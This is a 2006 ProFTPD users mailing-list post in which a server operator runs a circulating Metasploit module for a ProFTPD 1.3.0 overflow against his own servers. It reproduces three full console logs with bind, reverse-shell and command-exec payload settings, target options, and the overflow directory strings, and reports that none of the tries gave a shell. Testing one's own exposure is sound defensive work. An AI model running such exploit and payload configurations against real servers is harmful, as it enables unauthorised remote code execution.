This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.

--1598386693-357310496-1164710113=:4578
Content-Type: TEXT/PLAIN; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: QUOTED-PRINTABLE


On Sun, 26 Nov 2006, Zube wrote:

-> > Does this entire threat depend on the use of the=20
-> > CommandBufferSize directive,
-> > which would have to be manually added to any sample starting=20
-> > configuration?

-> It appears the answer is no. This posting:
->=20
-> http://archives.neohapsis.com/archiv...6-q4/0224.html
->=20
-> suggests that the 0-day has nothing to do with the CommandBufferSize
-> directive.

As vd_proftpd.pm is posted around several places now, I got ahold of it and=
=20
wanted to see what would happen in an actual attack. Here's several real tr=
ies=20
using vd_proftpd.pm on Metasploit:

Try #1:=20
-------

From-source compiled, libssp add-on, 1.3.0 on LAN, writable directory (all=
=20
tries have a writable directory) exploit seems to work but no shell (exits=
=20
quickly):

Exploit and Payload Options
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D

Exploit: Name Default Description
-------- ------ ------------- -------------------
required PASS ftp123 Password
required RHOST 192.168.10.76 The target address
optional DIR /vdrl-upload Writeable directory
required RPORT 21 The target port
required USER anonymous Username

Payload: Name Default Description
-------- ------ ------- -----------------------------
required LPORT 4444 Listening port for bind shell

Target: ProFTPD 1.3.0 (source install) / Debian 3.1

msf vd_proftpd(linux_ia32_bind) > exploit[*] Starting Bind Handler.
Banner: 220-220- ###### ####### ####### ######220- #
# ##### #### # # # #220- # # # # # # #
# # #220- ###### # # # # ##### # ######220- #
##### # # # # #220- # # # # # # =
#
#220- # # # #### # # # d220-220-
ATr2 RG 2006 FTP Server @ VDRL220- 220-
220- _@gE@##Emh_ 220- _g@*"_F
*@ 220- _@*__g#~ @ {220- @@*=
"
# ' 220- _#@ ]! ," 220-
t { _-" 220- . ~ 220-
220 ProFTPD 1.3.0 Server (FTP [ATr2 RG 2006] At VDRL) [192.168.10.76]
USER response: 331 Anonymous login ok, send your complete email address as
your password.
PASS response: 230 Request accepted, continue.
CWD response:
250-250-250-%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%250-250-[Uploadable
Directory] This area is250-for the upload of user's files. The250-directory
allows read/write to be250-able to view & verify your
own250-upload.250-250-It would also be a good idea to send250-an email to
ftpadmin vdrl.ath.cx to250-make sure your file gets attented
to.250-250-%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%250- 250 CWD command
successful
Current directory: /vdrl-upload/
Dir1 length is 238 bytes
MKD response: 257
"/vdrl-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAA"
- Directory successfully created
CWD response: 250 CWD command successful
PWD response: 257
"/vdrl-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAA"
is current directory.
Dir2 length is 100 bytes
MKD response: 257
"/vdrl-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAA/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=
BBBBBBBBBBBBBBBBB=C8=F4Y
=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=C C=CC=CC=
=CC=CC=CC=CC=CC=CC=CC=CC=CC" - Directory successfully
created
PASV response: 227 Entering Passive Mode (192,168,10,76,13,116).
Opening connection to 192.168.10.76:3444
STOR response: 150 Opening BINARY mode data connection for
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB=C8=F4Y

=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=C C=CC=CC=CC=CC=CC=CC=CC=CC=
=CC=CC=CC/.message
FILE transfered: 226 Transfer complete.[*] Exiting Bind Handler.


It mangles my ascii banner, but no shell...

Try #2
------

From-source compile, libssp add-on, 1.3.0, new payload, inet to LAN,
writable directory & anonymous:


msf vd_proftpd(linux_ia32_reverse) > show options

Exploit and Payload Options
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D

Exploit: Name Default Description
-------- ------ ------------ -------------------
required PASS ftp123 Password
required RHOST 69.95.5.114 The target address
optional DIR /atr2-upload Writeable directory
required RPORT 21 The target port
required USER anonymous Username

Payload: Name Default Description
-------- ------ ------------- ---------------------------------=
--
required LHOST 192.168.10.75 Local address to receive connecti=
on
required LPORT 4321 Local port to receive connection

Target: ProFTPD 1.3.0 (source install) / Debian 3.1

msf vd_proftpd(linux_ia32_reverse) > exploit[*] Starting Reverse Handler.
Banner: 220-######--------------------------------------------------+220-#/
/#/ #####/ #### [ATr2 RG] FTP Server @ ATr2 |220-#//// #/ #/ # #/
# |220-######/ #/// # #/ #
------------------------------+220-#/ #####/ #/ # Tue Nov 28
04:26:38 2006 220-#/ #/ #/ #/// # 68638832 free.
ftpadmin atr2.ath.cx220-#/ #/ # #### FTPD
220-------------------------_@gE@##Emh_ 220-
_g@*"_F *@ 220- _@*__g#~ @ {220-
@@*" # ' 220- _#@ ]! ," 220-
t { _-" 220- . ~220- Graced
By A Distro-Free Linux.///////////////// 220-
/////////////////////////////Powered By Proftpd. 220-
------------------------------------------------ 220- This is the
ATr2 RG FTP Server @ Atr2. All 220- connections are logged. Please use
a valid email 220- address for anonymous access (NOT
@microsoft.com,220- @example.com, leech, @nowhere.org, or leech@).220-
220- NO WEB BROWSERS, please, they make a mess of ftp. 220- 220-
Indexing, mirroring, web bots/recursive downloads220- forbidden: you
will be banned quickly. Those who220- are associated with, in ANY way:
RIAA, Microsoft,220- antivirus firm without express prior
permission,220- or any governmental, local, national, private, or 220-
international law enforcement agency or 220- investigations
firm/agency:220- Access is PROHIBITED: Private Server/Property.220-
------------------------------------------------220-
220 ProFTPD 1.3.0 Server (FTP [ATr2 RG 2006] Server) [69.95.5.114]
USER response: 331 Anonymous login ok, send your complete email address as
your password.
PASS response: 230 OK: hop to it.
CWD response: 250-250-250- =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D250-
[UpLoadable Area] Incoming files can250- be placed in this directory. To
get250- them attention (faster), you can 250- send a brief notice to the FT=
P
Admin250- at 250-
ftpadmin atr2.ath.cx250-=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D250- 250 CW=
D
command successful
Current directory: /atr2-upload/
Dir1 length is 238 bytes
MKD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAA"
- Directory successfully created
CWD response: 250 CWD command successful
PWD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAA"
is current directory.
Dir2 length is 100 bytes
MKD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAA/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=
BBBBBBBBBBBBBBBBB=C8=F4Y
=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=C C=CC=CC=
=CC=CC=CC=CC=CC=CC=CC=CC=CC" - Directory successfully
created
PASV response: 227 Entering Passive Mode (69,95,5,114,11,234).
Opening connection to 69.95.5.114:3050
STOR response: 150 Opening BINARY mode data connection for
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB=C8=F4Y

=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=C C=CC=CC=CC=CC=CC=CC=CC=CC=
=CC=CC=CC/.message
FILE transfered: 226 Transfer complete.[*] Exiting Reverse Handler.

msf vd_proftpd(linux_ia32_reverse) >


No shell, same as before, this left in writable directory:

ls /home/ftp/atr2-upload/
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAA/
auto-gzip/
README



Try #3:
---------

Same server, using exec payload (uname -a, with full path)


msf vd_proftpd(linux_ia32_exec) > show options

Exploit and Payload Options
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D

Exploit: Name Default Description
-------- ------ ------------ -------------------
required PASS ftp123 Password
required RHOST 69.95.5.114 The target address
optional DIR /atr2-upload Writeable directory
required RPORT 21 The target port
required USER anonymous Username

Payload: Name Default Description
-------- ------ -------- -----------------------------
required CMD uname -a The command string to execute

Target: ProFTPD 1.3.0 (source install) / Debian 3.1

msf vd_proftpd(linux_ia32_exec) > which uname
/bin/uname
msf vd_proftpd(linux_ia32_exec) > set CMD "/bin/uname -a"
CMD -> /bin/uname -a
msf vd_proftpd(linux_ia32_exec) > exploit
Banner: 220-######--------------------------------------------------+220-#/
/#/ #####/ #### [ATr2 RG] FTP Server @ ATr2 |220-#//// #/ #/ # #/
# |220-######/ #/// # #/ #
------------------------------+220-#/ #####/ #/ # Tue Nov 28
04:33:04 2006 220-#/ #/ #/ #/// # 68638832 free.
ftpadmin atr2.ath.cx220-#/ #/ # #### FTPD
220-------------------------_@gE@##Emh_ 220-
_g@*"_F *@ 220- _@*__g#~ @ {220-
@@*" # ' 220- _#@ ]! ," 220-
t { _-" 220- . ~220- Graced
By A Distro-Free Linux.///////////////// 220-
/////////////////////////////Powered By Proftpd. 220-
------------------------------------------------ 220- This is the
ATr2 RG FTP Server @ Atr2. All 220- connections are logged. Please use
a valid email 220- address for anonymous access (NOT
@microsoft.com,220- @example.com, leech, @nowhere.org, or leech@).220-
220- NO WEB BROWSERS, please, they make a mess of ftp. 220- 220-
Indexing, mirroring, web bots/recursive downloads220- forbidden: you
will be banned quickly. Those who220- are associated with, in ANY way:
RIAA, Microsoft,220- antivirus firm without express prior
permission,220- or any governmental, local, national, private, or 220-
international law enforcement agency or 220- investigations
firm/agency:220- Access is PROHIBITED: Private Server/Property.220-
------------------------------------------------220-
220 ProFTPD 1.3.0 Server (FTP [ATr2 RG 2006] Server) [69.95.5.114]
USER response: 331 Anonymous login ok, send your complete email address as
your password.
PASS response: 230 OK: hop to it.
CWD response: 250-250-250- =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D250-
[UpLoadable Area] Incoming files can250- be placed in this directory. To
get250- them attention (faster), you can 250- send a brief notice to the FT=
P
Admin250- at 250-
ftpadmin atr2.ath.cx250-=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D=3D=3D=3D250- 250 CW=
D
command successful
Current directory: /atr2-upload/
Dir1 length is 238 bytes
MKD response: 550
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAA:
File exists
CWD response: 250 CWD command successful
PWD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAA"
is current directory.
Dir2 length is 100 bytes
MKD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAA/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=
BBBBBBBBBBBBBBBBB=C8=F4Y
=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=C C=CC=CC=
=CC=CC=CC=CC=CC=CC=CC=CC=CC" - Directory successfully
created
PASV response: 227 Entering Passive Mode (69,95,5,114,18,15).
Opening connection to 69.95.5.114:4623
STOR response: 150 Opening BINARY mode data connection for
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB=C8=F4Y

=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=C C=CC=CC=CC=CC=CC=CC=CC=CC=
=CC=CC=CC/.message
FILE transfered: 226 Transfer complete.
msf vd_proftpd(linux_ia32_exec) >

Alot of sizzle, but no bang again. Conclusion: it may work in some situatio=
ns,=20
doesn't seem to work here. It seems very close, too close for comfort. Preh=
aps=20
an address is different in my binary that the exploit relies on?

root@atr2 local/bin # rc.proftpd stop=20
+ Proftpd server terminated

=2E..while I compile a new one.

-> Sad to say but I'm moving over to vsftpd, at least for the time being.

I'll give out a shell before I use that


--=20
Linux 2.6.18.2 on Pentium II (Klamath) up 69.33
Linux 2.6.18.2 on Intel(R) Pentium(R) 4 CPU 2.80GHz up 20.03
Minix 2.0.4 (currently offline)
--1598386693-357310496-1164710113=:4578
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys - and earn cash
http://www.techsay.com/default.php?p...rge&CID=DEVDEV
--1598386693-357310496-1164710113=:4578
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
ProFTPD Users List
Unsubscribe problems?
http://www.proftpd.org/list-unsub.html
--1598386693-357310496-1164710113=:4578--